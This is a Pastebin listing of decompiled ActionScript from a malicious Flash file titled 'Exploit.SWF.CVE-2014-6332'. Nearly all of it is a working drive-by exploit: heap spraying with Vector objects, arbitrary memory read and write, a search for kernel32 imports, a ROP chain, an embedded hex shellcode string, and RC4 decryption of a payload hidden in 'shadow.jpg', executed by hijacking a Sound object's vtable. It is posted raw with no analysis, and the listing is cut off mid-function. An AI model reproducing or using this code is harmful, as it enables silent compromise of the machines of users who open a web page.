API tools faq
paste
Advertisement
physicaldrive0

Exploit.SWF.CVE-2014-6332

physicaldrive0
Nov 21st, 2014
834
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 32.14 KB | None | 0 0
raw download clone embed print report
  1. *** PhysicalDrive0 ***
  2.  
  3. package mx.core {
  4.  
  5. public namespace mx_internal = "http://www.adobe.com/2006/flex/mx/internal";
  6. }//package mx.core
  7. package mx.core {
  8.  
  9. public interface IFlexAsset {
  10.  
  11. }
  12. }//package mx.core
  13. package mx.core {
  14. import flash.utils.*;
  15.  
  16. public class ByteArrayAsset extends ByteArray implements IFlexAsset {
  17.  
  18. mx_internal static const VERSION:String = "4.6.0.23201";
  19.  
  20. }
  21. }//package mx.core
  22. package {
  23. import mx.core.*;
  24.  
  25. public class flappyMan_keyClass extends ByteArrayAsset {
  26.  
  27. }
  28. }//package
  29. package {
  30. import flash.events.*;
  31. import flash.utils.*;
  32. import flash.display.*;
  33. import flash.media.*;
  34. import __AS3__.vec.*;
  35. import flash.net.*;
  36. import flash.external.*;
  37.  
  38. public class flappyMan extends MovieClip {
  39.  
  40. public var keyClass:Class;
  41. private var btaObj:ByteArray;
  42. private var outObj:theoutobj;
  43. private var sndObj:Sound;
  44. public var vtObj20W:Vector.<Object>;
  45. public var vtObj1H:Vector.<Object>;
  46. public var vtObj20WLen:int = 1022;
  47. public var vtObj1HLen:int = 1007;
  48. private var workTimerExploit:Timer;
  49. private var bGoNextStep:Boolean = false;
  50. private var bExploited:Boolean = false;
  51. private var infectedObjIndex:int = 0;
  52. private var changedPropertyObjIndex:int = 0;
  53. private var iLoopCount:int = 0;
  54. private var controlledAddr:uint = 0;
  55. private var heapSprayObjAddr:uint = 0x1E140000;
  56. private var fakeEnvcoreObjAddr:uint;
  57. private var offset:int = 0;
  58. private var iCountOffset:int = 184;
  59. private var stackMemoryStructAddr:int = 0;
  60. private var flagNumber:uint = 3735928545;
  61. private var flagSavePosition:int = 176;
  62. private var ropChainLen:int = 0;
  63. private var uiNopValue:uint = 0;
  64. private var recObjAddr:uint = 0;
  65. private var _MaxCountPos:uint = 0;
  66. private var heapSprayLenByEnv20W:int = 98688;
  67. private var storedObjIndex:int = 0;
  68. public var fModuleAddrStart:int = 0;
  69. public var fModuleAddrEnd:int = 0;
  70. private var code:String = "";
  71. private var stopCode:String = "";
  72. private var jpgBytes:ByteArray;
  73. private var jpgLoader:URLLoader;
  74. private var floatString:String = "";
  75.  
  76. public function flappyMan(){
  77. this.keyClass = flappyMan_keyClass;
  78. this.fakeEnvcoreObjAddr = (this.heapSprayObjAddr + 0x0100);
  79. this.stackMemoryStructAddr = (this.heapSprayObjAddr + 32);
  80. this.btaObj = new ByteArray();
  81. this.outObj = new theoutobj();
  82. this.sndObj = new Sound();
  83. this.vtObj20W = new Vector.<Object>(this.heapSprayLenByEnv20W);
  84. this.vtObj1H = new Vector.<Object>(256);
  85. var _local1:Number = 500;
  86. var _local2:int = (17 * 2);
  87. this.workTimerExploit = new Timer((_local1 / 2), _local2);
  88. super();
  89. var _local3:* = new URLRequest();
  90. this.jpgBytes = new ByteArray();
  91. this.jpgLoader = new URLLoader();
  92. _local3.url = "shadow.jpg";
  93. this.jpgLoader.dataFormat = URLLoaderDataFormat.BINARY;
  94. this.jpgLoader.addEventListener(Event.COMPLETE, this.func_prepare);
  95. this.jpgLoader.load(_local3);
  96. }
  97. private function evalCode(_arg1:uint):void{
  98. if (ExternalInterface.available){
  99. ExternalInterface.call("Beginx", "");
  100. };
  101. }
  102. private function checkEvnExploitable():Boolean{
  103. return (true);
  104. }
  105. private function checksharobject():Boolean{
  106. var _local2:Number;
  107. var _local1:SharedObject = SharedObject.getLocal("flashplayerinUSA");
  108. if (_local1.size == 0){
  109. _local1.close();
  110. return (false);
  111. };
  112. _local2 = (new Date().time - _local1.data.now);
  113. if (_local2 < ((((1 * 24) * 60) * 60) * 1000)){
  114. _local1.close();
  115. return (true);
  116. };
  117. _local1.close();
  118. return (false);
  119. }
  120. private function setsharobject():Boolean{
  121. var _local1:SharedObject = SharedObject.getLocal("flashplayerinUSA");
  122. if (_local1.size == 0){
  123. _local1.data.now = new Date().time;
  124. _local1.flush();
  125. _local1.close();
  126. return (true);
  127. };
  128. return (false);
  129. }
  130. public function func_prepare(_arg1:Event):void{
  131. var _local2:int;
  132. var _local3:int;
  133. var _local4:int;
  134. if (((!(this.checkEvnExploitable())) || (this.checksharobject()))){
  135. return;
  136. };
  137. _local2 = 0;
  138. while (_local2 < this.heapSprayLenByEnv20W) {
  139. this.vtObj20W[_local2] = new Vector.<uint>(this.vtObj20WLen);
  140. this.vtObj20W[_local2][(this.vtObj20WLen - 2)] = 1;
  141. _local2++;
  142. };
  143. _local2 = 0;
  144. while (_local2 < 0x0100) {
  145. this.vtObj1H[_local2] = new Vector.<Object>(this.vtObj1HLen);
  146. _local3 = 0;
  147. while (_local3 < this.vtObj1HLen) {
  148. this.vtObj1H[_local2][_local3] = this.sndObj;
  149. _local3++;
  150. };
  151. _local2++;
  152. };
  153. this.evalCode(0);
  154. this.workTimerExploit.start();
  155. this.workTimerExploit.addEventListener(TimerEvent.TIMER, this.func_step2);
  156. }
  157. public function func_step2(_arg1:Event):void{
  158. if (this.bExploited == true){
  159. this.workTimerExploit.stop();
  160. return;
  161. };
  162. var _local2:int;
  163. while (_local2 < this.heapSprayLenByEnv20W) {
  164. try {
  165. if ((this.vtObj20W[_local2] as Vector.<uint>).length > this.vtObj20WLen){
  166. this.bExploited = true;
  167. break;
  168. };
  169. } catch(e:Error) {
  170. };
  171. _local2++;
  172. };
  173. if (!this.bExploited){
  174. return;
  175. };
  176. this.workTimerExploit.stop();
  177. this.changedPropertyObjIndex = _local2;
  178. this.storedObjIndex = this.changedPropertyObjIndex;
  179. _local2 = 0;
  180. this.uiNopValue = this.vtObj20W[this.changedPropertyObjIndex][((0x1000 / 4) - 2)];
  181. if (this.uiNopValue != this.vtObj20WLen){
  182. this._MaxCountPos = (((this.vtObj20W[this.storedObjIndex].length - (0x1000 / 4)) - 2) / (0x1000 / 4));
  183. _local2 = 0;
  184. while (_local2 < this._MaxCountPos) {
  185. this.uiNopValue = this.vtObj20W[this.changedPropertyObjIndex][(((0x1000 / 4) - 2) + ((0x1000 / 4) * _local2))];
  186. if (this.uiNopValue == this.vtObj20WLen){
  187. break;
  188. };
  189. _local2++;
  190. };
  191. if (_local2 == this._MaxCountPos){
  192. this.bExploited = true;
  193. return;
  194. };
  195. };
  196. this.recObjAddr = this.vtObj20W[this.changedPropertyObjIndex][(((0x1000 / 4) - 1) + ((0x1000 / 4) * _local2))];
  197. this.vtObj20W[this.changedPropertyObjIndex][(((0x1000 / 4) - 2) + ((0x1000 / 4) * _local2))] = 1073741823;
  198. if (this.checkProperty() == false){
  199. return;
  200. };
  201. this.controlledAddr = ((this.heapSprayObjAddr + (0x1000 * (_local2 + 1))) + 8);
  202. var _local3:uint;
  203. var _local4:uint = (this.controlledAddr + ((this.heapSprayLenByEnv20W - this.changedPropertyObjIndex) * 0x1000));
  204. _local2 = ((this.controlledAddr & 0xFFFFF000) + 0x1000);
  205. while (_local2 < _local4) {
  206. if (((((((((((((!((this.readUnsignedInt((_local2 + (4 * 4))) == 0))) && (!((this.readUnsignedInt((_local2 + (6 * 4))) == 0))))) && ((this.readUnsignedInt((_local2 + (7 * 4))) == 0)))) && ((this.readUnsignedInt((_local2 + (8 * 4))) == 0)))) && ((this.readUnsignedInt((_local2 + (12 * 4))) == 0)))) && ((this.readUnsignedInt((_local2 + (13 * 4))) == 0)))) && ((this.readUnsignedInt((_local2 + (15 * 4))) == 2)))){
  207. _local3 = _local2;
  208. break;
  209. };
  210. _local2 = (_local2 + 0x1000);
  211. };
  212. if (!_local3){
  213. return (this.safe_exit());
  214. };
  215. var _local5:int = _local3;
  216. while (1) {
  217. if (_local5 < 65536){
  218. return (this.safe_exit());
  219. };
  220. if (this.readUnsignedInt((_local5 + 16)) < 5){
  221. break;
  222. };
  223. _local5 = this.readUnsignedInt((16 + _local5));
  224. };
  225. var _local6:int;
  226. var _local7:int;
  227. while (_local6 < 100) {
  228. if ((((((this.readUnsignedInt(((_local5 + 80) + (_local6 * 40))) > 0x10000000)) && ((this.readUnsignedInt(((_local5 + 76) + (_local6 * 40))) == 0)))) && ((this.readUnsignedInt(((_local5 + 84) + (_local6 * 40))) == 0)))){
  229. _local7 = this.readUnsignedInt(((_local5 + 80) + (_local6 * 40)));
  230. if ((((((((this.readUnsignedInt((_local7 + 4)) == 1007)) && ((this.readUnsignedInt((_local7 + 16)) == this.readUnsignedInt((_local7 + 64)))))) && ((this.readUnsignedInt((_local7 + 28)) == this.readUnsignedInt((_local7 + 44)))))) && (this.readUnsignedInt((_local7 + 28))))){
  231. break;
  232. };
  233. };
  234. _local6++;
  235. };
  236. if (_local6 == 100){
  237. return (this.safe_exit());
  238. };
  239. _local7 = this.readUnsignedInt((_local7 + 28));
  240. _local7 = (_local7 & 0xFFFFFFFC);
  241. var _local8:uint = this.readUnsignedInt(_local7);
  242. _local8 = (_local8 & 0xFFFF0000);
  243. while (1) {
  244. if ((this.readUnsignedInt(_local8) % 65536) == 23117){
  245. break;
  246. };
  247. _local8 = (_local8 - 65536);
  248. };
  249. var _local9:uint = _local8;
  250. _local8 = this.readUnsignedInt((_local9 + 60));
  251. _local8 = this.readUnsignedInt(((_local9 + _local8) + 128));
  252. _local8 = (_local9 + _local8);
  253. var _local10:int = _local8;
  254. var _local11:int;
  255. var _local12:int;
  256. _local6 = 0;
  257. while (_local6 < 20) {
  258. _local8 = (_local9 + this.readUnsignedInt(((_local10 + (_local6 * 20)) + 12)));
  259. if ((this.readUnsignedInt(_local8) ^ 0x20202020) == 1852990827){
  260. _local12 = (_local9 + this.readUnsignedInt((_local10 + (_local6 * 20))));
  261. _local11 = (_local9 + this.readUnsignedInt(((_local10 + (_local6 * 20)) + 16)));
  262. break;
  263. };
  264. _local6++;
  265. };
  266. if (_local6 == 20){
  267. return (this.safe_exit());
  268. };
  269. var _local13:uint;
  270. var _local14:uint;
  271. var _local15:uint;
  272. var _local16:uint;
  273. var _local17:int;
  274. _local6 = 0;
  275. while ((((_local6 < 1367)) && ((_local17 < 2)))) {
  276. _local8 = (_local9 + this.readUnsignedInt((_local12 + (_local6 * 4))));
  277. if ((((_local8 == _local9)) || ((_local8 > (_local9 + 0xFFFFFF))))){
  278. break;
  279. };
  280. if (((!(_local13)) && ((((((this.readUnsignedInt((_local8 + 2)) == 1953655126)) && ((this.readUnsignedInt((_local8 + 6)) == 1097621877)))) && ((this.readUnsignedInt((_local8 + 10)) == 1668246636)))))){
  281. _local14 = (_local11 + (_local6 * 4));
  282. _local13 = this.readUnsignedInt(_local14);
  283. _local17++;
  284. } else {
  285. if (((!(_local15)) && ((((((this.readUnsignedInt((_local8 + 2)) == 1349805383)) && ((this.readUnsignedInt((_local8 + 6)) == 1097035634)))) && ((this.readUnsignedInt((_local8 + 10)) == 1701995620)))))){
  286. _local16 = (_local11 + (_local6 * 4));
  287. _local15 = this.readUnsignedInt(_local16);
  288. _local17++;
  289. };
  290. };
  291. _local6++;
  292. };
  293. if (_local6 == 1367){
  294. return (this.safe_exit());
  295. };
  296. this.fModuleAddrStart = this.readUnsignedInt((_local9 + 60));
  297. this.fModuleAddrEnd = this.readUnsignedInt(((_local9 + this.fModuleAddrStart) + 264));
  298. this.fModuleAddrStart = this.readUnsignedInt(((_local9 + this.fModuleAddrStart) + 260));
  299. this.fModuleAddrStart = (_local9 + this.fModuleAddrStart);
  300. this.fModuleAddrEnd = (_local9 + this.fModuleAddrEnd);
  301. _local6 = this.fModuleAddrStart;
  302. this.writeUnsignedInt((this.stackMemoryStructAddr - 8), this.fModuleAddrStart);
  303. this.writeUnsignedInt((this.stackMemoryStructAddr - 4), this.fModuleAddrEnd);
  304. var _local18:int;
  305. _local6 = this.fModuleAddrStart;
  306. while (_local6 < this.fModuleAddrEnd) {
  307. if ((((((this.readUnsignedInt(_local6) == _local14)) && (((this.readUnsignedInt((_local6 - 2)) & 0xFFFF) == 5631)))) && (((this.readUnsignedInt((_local6 + 4)) & 0xFF) == 195)))){
  308. _local18 = (_local6 - 2);
  309. break;
  310. };
  311. _local6++;
  312. };
  313. var _local19:uint;
  314. var _local20:uint;
  315. var _local21:uint;
  316. var _local22:uint;
  317. var _local23:uint;
  318. var _local24:uint;
  319. var _local25:uint;
  320. var _local26:uint;
  321. _local6 = (this.fModuleAddrStart + 0x1000);
  322. _local17 = 0;
  323. while ((((_local6 < (this.fModuleAddrEnd - 4))) && ((_local17 < 4)))) {
  324. _local21 = this.readUnsignedInt(_local6);
  325. if (((!(_local26)) && (((_local21 & 0xFFFF) == 50068)))){
  326. _local26 = _local6;
  327. _local17++;
  328. };
  329. if (((!(_local25)) && (((_local21 & 0xFFFF) == 50070)))){
  330. _local25 = _local6;
  331. _local17++;
  332. };
  333. if (((!(_local23)) && (((_local21 & 0xFFFF) == 50008)))){
  334. _local23 = _local6;
  335. _local17++;
  336. };
  337. if (((!(_local24)) && (((_local21 & 0xFFFF) == 8447)))){
  338. _local24 = _local6;
  339. _local17++;
  340. };
  341. _local6++;
  342. };
  343. if ((((((((((((((_local13 == 0)) || ((_local25 == 0)))) || ((_local24 == 0)))) || ((_local23 == 0)))) || ((_local18 == 0)))) || ((_local15 == 0)))) || ((_local26 == 0)))){
  344. return (this.safe_exit());
  345. };
  346. var _local27:int = (_local25 + 1);
  347. var _local28:int = (this.heapSprayObjAddr + 65792);
  348. var _local29 = (_local28 & 0xFFFFF000);
  349. var _local30:ByteArray = new ByteArray();
  350. _local30.endian = Endian.LITTLE_ENDIAN;
  351. _local6 = 0;
  352. while (_local6 < 0x0100) {
  353. var _temp1 = _local6;
  354. _local6 = (_local6 + 1);
  355. _local30.writeUnsignedInt(this.readUnsignedInt((_local29 + (4 * _temp1))));
  356. };
  357. var _local31:ByteArray = new ByteArray();
  358. _local31.endian = Endian.LITTLE_ENDIAN;
  359. _local6 = 0;
  360. while (_local6 < 262144) {
  361. var _temp2 = _local6;
  362. _local6 = (_local6 + 1);
  363. _local31.writeUnsignedInt(this.readUnsignedInt((_local28 + (4 * _temp2))));
  364. };
  365. var _local32 = 96;
  366. var _local33 = 32;
  367. var _local34:int;
  368. var _local35:uint = ((_local28 + _local32) + _local33);
  369. var _temp3 = _local34;
  370. _local34 = (_local34 + 1);
  371. this.writeUnsignedInt((_local29 + (4 * _temp3)), _local35);
  372. _local34 = 0;
  373. var _temp4 = _local34;
  374. _local34 = (_local34 + 1);
  375. this.writeUnsignedInt((_local28 + (4 * _temp4)), _local27);
  376. var _temp5 = _local34;
  377. _local34 = (_local34 + 1);
  378. this.writeUnsignedInt((_local28 + (4 * _temp5)), _local25);
  379. var _temp6 = _local34;
  380. _local34 = (_local34 + 1);
  381. this.writeUnsignedInt((_local28 + (4 * _temp6)), _local23);
  382. var _temp7 = _local34;
  383. _local34 = (_local34 + 1);
  384. this.writeUnsignedInt((_local28 + (4 * _temp7)), _local28);
  385. var _temp8 = _local34;
  386. _local34 = (_local34 + 1);
  387. this.writeUnsignedInt((_local28 + (4 * _temp8)), _local18);
  388. var _temp9 = _local34;
  389. _local34 = (_local34 + 1);
  390. this.writeUnsignedInt((_local28 + (4 * _temp9)), _local29);
  391. var _temp10 = _local34;
  392. _local34 = (_local34 + 1);
  393. this.writeUnsignedInt((_local28 + (4 * _temp10)), 65536);
  394. var _temp11 = _local34;
  395. _local34 = (_local34 + 1);
  396. this.writeUnsignedInt((_local28 + (4 * _temp11)), 0x1000);
  397. var _temp12 = _local34;
  398. _local34 = (_local34 + 1);
  399. this.writeUnsignedInt((_local28 + (4 * _temp12)), 64);
  400. var _temp13 = _local34;
  401. _local34 = (_local34 + 1);
  402. this.writeUnsignedInt((_local28 + (4 * _temp13)), (_local18 + 6));
  403. var _temp14 = _local34;
  404. _local34 = (_local34 + 1);
  405. this.writeUnsignedInt((_local28 + (4 * _temp14)), (_local18 + 6));
  406. var _temp15 = _local34;
  407. _local34 = (_local34 + 1);
  408. this.writeUnsignedInt((_local28 + (4 * _temp15)), (_local18 + 6));
  409. var _temp16 = _local34;
  410. _local34 = (_local34 + 1);
  411. this.writeUnsignedInt((_local28 + (4 * _temp16)), _local24);
  412. var _temp17 = _local34;
  413. _local34 = (_local34 + 1);
  414. this.writeUnsignedInt((_local28 + (4 * _temp17)), _local24);
  415. this.ropChainLen = (_local34 * 4);
  416. while (_local34 < (_local32 / 4)) {
  417. var _temp18 = _local34;
  418. _local34 = (_local34 + 1);
  419. this.writeUnsignedInt((_local28 + (4 * _temp18)), (_local28 + _local32));
  420. };
  421. while (_local34 < ((_local32 + _local33) / 4)) {
  422. var _temp19 = _local34;
  423. _local34 = (_local34 + 1);
  424. this.writeUnsignedInt((_local28 + (4 * _temp19)), _local26);
  425. };
  426. this.ropChainLen = _local34;
  427. var _temp20 = _local34;
  428. _local34 = (_local34 + 1);
  429. this.writeUnsignedInt((_local28 + (4 * _temp20)), 2425415307);
  430. var _temp21 = _local34;
  431. _local34 = (_local34 + 1);
  432. this.writeUnsignedInt((_local28 + (4 * _temp21)), 0x90909090);
  433. var _temp22 = _local34;
  434. _local34 = (_local34 + 1);
  435. this.writeUnsignedInt((_local28 + (4 * _temp22)), 3096481936);
  436. var _temp23 = _local34;
  437. _local34 = (_local34 + 1);
  438. this.writeUnsignedInt((_local28 + (4 * _temp23)), (this.heapSprayObjAddr + 8));
  439. var _temp24 = _local34;
  440. _local34 = (_local34 + 1);
  441. this.writeUnsignedInt((_local28 + (4 * _temp24)), 3146813584);
  442. var _temp25 = _local34;
  443. _local34 = (_local34 + 1);
  444. this.writeUnsignedInt((_local28 + (4 * _temp25)), _local15);
  445. var _temp26 = _local34;
  446. _local34 = (_local34 + 1);
  447. this.writeUnsignedInt((_local28 + (4 * _temp26)), 2425362569);
  448. var _temp27 = _local34;
  449. _local34 = (_local34 + 1);
  450. this.writeUnsignedInt((_local28 + (4 * _temp27)), 3096481936);
  451. var _temp28 = _local34;
  452. _local34 = (_local34 + 1);
  453. this.writeUnsignedInt((_local28 + (4 * _temp28)), (_local35 + (((_local34 - this.ropChainLen) + 1) * 4)));
  454. var _temp29 = _local34;
  455. _local34 = (_local34 + 1);
  456. this.writeUnsignedInt((_local28 + (4 * _temp29)), 2428752127);
  457. var _local36 = "81ec8b550003ccec57565300fc6085c70000ffff85c70000fffffc3800000000fd1885c70000ffff85c70000fffffc7000000000fc4485c70001ffff85c70000fffffce400000000fcd885c70000ffff85c70000fffffc3c00000000fd0c85c70000ffff45c70000000000fcf485c70000fffffcc7000000fffc4c85000000ff0085c70000fffffd33000000858966c0fffffc648966c933fffd108ddc85c7ff00fffffcc7000000fffd0485000000fff885c70000fffffcc7000000fffc5085000000ff0885c70000fffffdc7000000fffc5885000000ff5c85c70000fffffcc7000000fffc4885000000ff6885c70000fffffcc7000000fffd2485000000ff4085c70000fffffcc7000000fffc5485000000fffc85c70000fffffcc7000000fffc7485000000ff7885c70000fffffcc7000000fffc7c85000000ffe885c70045fffffcc754454dfffcec854c442efff085c74c00fffffcc7000000fffd1c85000000ff2085c70000fffffdc7000000fffce085000000ff6c85c70000fffffcc7000000fffc8085917432ff8485c70c85fffffcc7bbafdffffc8885de5967ff8c85c71e05fffffcc76144aafffc90853d8815ff9485c76c58fffffcc797410ffffc9885e2f2b2ff9c85c7f4a0fffffcc7cb9765fffca08564a41effa485c7efbbfffffcc72729f8fffca885ae9074ffac85c78093fffffcc794e432fffcb0851f8dc4ffb485c77457fffffcc7ff0d66fffcb885a22f51ffbc85c70139fffffcc7837de2fffcc08507d145ffc485c74863fffffcc74fd189fffcc88517053dffcc85c78ed7fffffcc7818f6efffcd08544d772ffd485c78072fffffce88644d700000000f0002558002dffff89000100fffc488589008bfffffc588530a164ff8b00000085890c40fffffd148b1c408bdc8b0840fc488d8bec83ffff2404c7206553744e042444c76e6f4374082444c7747865740c2444c765726854102444c70000646151ff50548de38b08fffc808d544189ff28bd8d5733fffffdccb966c9f3c0330285c75faafffffd2800010010fd28958d6a52ffffd495fffe89fffffcfffd088508bd83ff00fffffd41e905748b000003fffc9085508589ff8dfffffcfffc8085f88b60ffa164c933000000308b0c408b688b1c4020588b084b38008bb1f375180c4b383332b1ec75750e4b38382eb1e5de75104bf78bed8be859126a0000001fee8bf9e26e686c6a546c6474c48316ff6ae88b0804e85903e20000005145ebf93c758b56782e748b8b56f503f50320764149c93333c503ad10be0fdb0874d63a0307cbc1f1eb40dae7751f3b245e8b5e8b66dd035e8b4b0c8bdd031cc5038b04c3595eab508d8b613bfffffcfffc908de90575ff00000278000000e885895800fffffc5c086a0c6afca895ffff50fffffffcc8957c8589ff83fffffcfffc7cbd057500ff000247e96a586a00a895ff0850fffffcfcc895ff958bfffffffffc7c8b084289fffc7c85087883ffe90575000000021c8d8d586afffffc807c958b518bfffffcff500842fffccc950cc483fffc588d8b3981ffffdeadbeef958b7f75fffffc5841047a81754141417c858b708bfffffcfffc588d08518bff8b045089fffc58850cc083fffc788589046affff001000687c8d8b008bfffffc6a5204518895ff008bfffffcfffc7c8d8b0189fffffc7c95003a83ff858b2374fffffc7c5104488bfc78958b8b52fffffffc7c8551088bfffccc95ffc483ffff7c958b0c83fffffc0575003a000163e968046a000000100000010468ff006a00fffc8895208589ff83fffffdfffd20bd057500ff00013be920858b0050fffffd00010468bc95ff0089fffffcfffc6c856cbd83ff00fffffc15e905758b000001fffd208d6c8d03ffc7fffffc6e69770120958b6403fffffdfffc6c950442c7ff2e706d75fd20858b8503fffffffffc6c650840c76a00657800806800026a0000036a006a8d8b026afffffd20ac95ff5189fffffcfffce085e0bd83fffffffffcade905756a0000006c958d0052fffffcfc7c858b488bffff958b5104fffffc7c8b50028bfffce08d95ff51fffffffcb0fce0958bff52fffffffcb495e8858dff50fffffcfc9895ff8589fffffffffd1cfd1cbd837400ffff8b056a11fffd208d95ff51fffffffcb8958b4aebfffffcf8c095ff5260fffffc140000b8eb20891edb33592b89338b64c033044efd209d8b5350ffff808d8d508bfffffce1ff3849140000b88b008b1e07eb61e0ffffd0e890edebffc35de58b424242427042424277a0908055000000ec81ec8b000002d85608558bf445c75754454d452ef845c7c74c4c440000fc45d28500008d573f74fffd28bd66c933ff3302ccb95faaf3c08d08728bfffd288585c750fffffffd28000100106a544e8b85d1fffe8b0e75c0558d1846d0ff52f40175c0855de58bccc340c033cccccccccccccccc0000cccc";
  458. var _local37:uint = this.writeString((_local28 + (4 * _local34)), _local36);
  459. this.writeUnsignedInt(this.heapSprayObjAddr, _local37);
  460. var _local38:ByteArray = (new this.keyClass() as ByteArray);
  461. var _local39:ByteArray = new ByteArray();
  462. _local38.readBytes(_local39, 0, 0x0100);
  463. _local38.endian = Endian.LITTLE_ENDIAN;
  464. _local38.position = 0x0100;
  465. this.jpgBytes.endian = Endian.LITTLE_ENDIAN;
  466. this.jpgBytes.position = 0;
  467. ByteArray(this.jpgLoader.data).position = _local38.readInt();
  468. ByteArray(this.jpgLoader.data).readBytes(this.jpgBytes, 0, 0);
  469. this.jpgBytes = this.encryption(this.jpgBytes, _local39);
  470. this.jpgBytes.endian = Endian.LITTLE_ENDIAN;
  471. this.jpgBytes.position = 0;
  472. var _local40:* = this.jpgBytes.length;
  473. var _local41:int;
  474. var _local42:uint;
  475. while (((_local41 + 1) * 4) < _local40) {
  476. _local42 = this.jpgBytes.readInt();
  477. try {
  478. this.writeUnsignedInt((_local37 + (_local41 * 4)), _local42);
  479. } catch(e:Error) {
  480. };
  481. _local41++;
  482. };
  483. var _local43:uint = this.readUnsignedInt(_local7);
  484. this.writeUnsignedInt(_local7, _local28);
  485. this.sndObj.toString();
  486. this.writeUnsignedInt(_local7, _local43);
  487. _local31.position = 0;
  488. _local6 = 0;
  489. while (_local6 < (_local31.length / 4)) {
  490. var _temp30 = _local6;
  491. _local6 = (_local6 + 1);
  492. this.writeUnsignedInt((_local28 + (4 * _temp30)), _local31.readUnsignedInt());
  493. };
  494. _local30.position = 0;
  495. _local6 = 0;
  496. while (_local6 < (_local30.length / 4)) {
  497. var _temp31 = _local6;
  498. _local6 = (_local6 + 1);
  499. this.writeUnsignedInt((_local29 + (4 * _temp31)), _local30.readUnsignedInt());
  500. };
  501. this.setsharobject();
  502. return (this.safe_exit());
  503. }
  504. public function safe_exit():void{
  505. this.writeUnsignedInt(this.heapSprayObjAddr, this.vtObj20WLen);
  506. this.writeUnsignedInt((this.heapSprayObjAddr + 4), this.recObjAddr);
  507. this.writeUnsignedInt((this.controlledAddr - 8), this.vtObj20WLen);
  508. }
  509. public function logMsg(_arg1:String):void{
  510. if (ExternalInterface.available){
  511. };
  512. }
  513. public function get_address(_arg1:String):uint{
  514. var _local2:uint;
  515. if (ExternalInterface.available){
  516. _local2 = ExternalInterface.call(_arg1, "");
  517. };
  518. return (_local2);
  519. }
  520. public function exception_exit():void{
  521. if ((this.vtObj20W[this.changedPropertyObjIndex] as Vector.<uint>).length >= 1073741823){
  522. this.vtObj20W[this.changedPropertyObjIndex][(0x40000000 - 2)] = this.vtObj20WLen;
  523. };
  524. }
  525. private function read4bytes(_arg1:uint):uint{
  526. var _local2:uint;
  527. if (_arg1 > this.controlledAddr){
  528. _local2 = this.vtObj20W[this.changedPropertyObjIndex][((_arg1 - this.controlledAddr) / 4)];
  529. } else {
  530. _local2 = this.vtObj20W[this.changedPropertyObjIndex][(0x40000000 - ((this.controlledAddr - _arg1) / 4))];
  531. };
  532. return (_local2);
  533. }
  534. private function readUnsignedInt(_arg1:uint):uint{
  535. var _local2:uint;
  536. var _local3:uint;
  537. var _local4:uint;
  538. if ((_arg1 % 4) == 0){
  539. _local4 = this.read4bytes(_arg1);
  540. } else {
  541. if ((_arg1 % 4) == 1){
  542. _local3 = (((this.read4bytes((_arg1 - 1)) & 0xFFFFFF00) / 0x0100) & 0xFFFFFF);
  543. _local2 = (((this.read4bytes((_arg1 + 3)) & 0xFF) * 16777216) & 0xFF000000);
  544. _local4 = (_local2 + _local3);
  545. } else {
  546. if ((_arg1 % 4) == 2){
  547. _local3 = (((this.read4bytes((_arg1 - 2)) & 0xFFFF0000) / 65536) & 0xFFFF);
  548. _local2 = (((this.read4bytes((_arg1 + 2)) & 0xFFFF) * 65536) & 0xFFFF0000);
  549. _local4 = (_local2 + _local3);
  550. } else {
  551. _local3 = (((this.read4bytes((_arg1 - 3)) & 0xFF000000) / 16777216) & 0xFF);
  552. _local2 = (((this.read4bytes((_arg1 + 1)) & 0xFFFFFF) * 0x0100) & 0xFFFFFF00);
  553. _local4 = (_local2 + _local3);
  554. };
  555. };
  556. };
  557. return (_local4);
  558. }
  559. private function writeUnsignedInt(_arg1:uint, _arg2:uint):void{
  560. if (_arg1 > this.controlledAddr){
  561. this.vtObj20W[this.changedPropertyObjIndex][((_arg1 - this.controlledAddr) / 4)] = _arg2;
  562. } else {
  563. this.vtObj20W[this.changedPropertyObjIndex][(0x40000000 - ((this.controlledAddr - _arg1) / 4))] = _arg2;
  564. };
  565. }
  566. public function encryption(_arg1:ByteArray, _arg2:ByteArray):ByteArray{
  567. var _local3:ByteArray = new ByteArray();
  568. var _local4:uint = _arg1.length;
  569. _local3 = this.rc4_crypt(_arg2, _arg1, _local4);
  570. return (_local3);
  571. }
  572. public function rc4_crypt(_arg1:ByteArray, _arg2:ByteArray, _arg3:uint):ByteArray{
  573. var _local4:int;
  574. var _local5:int;
  575. var _local6:int;
  576. var _local7:uint;
  577. var _local8:uint;
  578. var _local9:ByteArray = new ByteArray();
  579. while (_local7 < _arg3) {
  580. _local4 = ((_local4 + 1) % 0x0100);
  581. _local5 = ((_local5 + _arg1[_local4]) % 0x0100);
  582. _local8 = _arg1[_local4];
  583. _arg1[_local4] = _arg1[_local5];
  584. _arg1[_local5] = _local8;
  585. _local6 = ((_arg1[_local4] + _arg1[_local5]) % 0x0100);
  586. _local9[_local7] = (_arg2[_local7] ^ _arg1[_local6]);
  587. _local7++;
  588. };
  589. return (_local9);
  590. }
  591. private function HexString2ByteArray(_arg1:String):ByteArray{
  592. var _local2:String;
  593. var _local3:uint = _arg1.length;
  594. var _local4:uint;
  595. var _local5:ByteArray = new ByteArray();
  596. _local5.endian = Endian.LITTLE_ENDIAN;
  597. while (_local4 < _local3) {
  598. _local2 = (_arg1.charAt(_local4) + _arg1.charAt((_local4 + 1)));
  599. _local5.writeByte(parseInt(_local2, 16));
  600. _local4 = (_local4 + 2);
  601. };
  602. return (_local5);
  603. }
  604. private function writeString(_arg1:int, _arg2:String):int{
  605. var _local3:int;
  606. var _local4:int;
  607. var _local5:int;
  608. var _local6:ByteArray = this.HexString2ByteArray(_arg2);
  609. while (_local3 < (_arg2.length / 2)) {
  610. _local5 = ((((_local6[_local3] * 16777216) + (_local6[(_local3 + 1)] * 65536)) + (_local6[(_local3 + 2)] * 0x0100)) + _local6[(_local3 + 3)]);
  611. _local3 = (_local3 + 4);
  612. this.writeUnsignedInt((_arg1 + (_local4 * 4)), _local5);
  613. _local4++;
  614. };
  615. return ((_arg1 + (_local4 * 4)));
  616. }
  617. private function checkProperty():Boolean{
  618. var _local1:int;
  619. while (_local1 < this.heapSprayLenByEnv20W) {
  620. if (this.vtObj20W[_local1].length == 1073741823){
  621. break;
  622. };
  623. _local1++;
  624. };
  625. if (_local1 == this.heapSprayLenByEnv20W){
  626. return (false);
  627. };
  628. this.changedPropertyObjIndex = _local1;
  629. return (true);
  630. }
  631.  
  632. }
  633. }//package
  634.  
  635. class theoutobj {
  636.  
  637. public function theoutobj(){
  638. }
  639. public function therundata(_arg1:uint, _arg2:uint, _arg3:uint):uint{
  640. var _local4:uint;
  641. return (_local4);
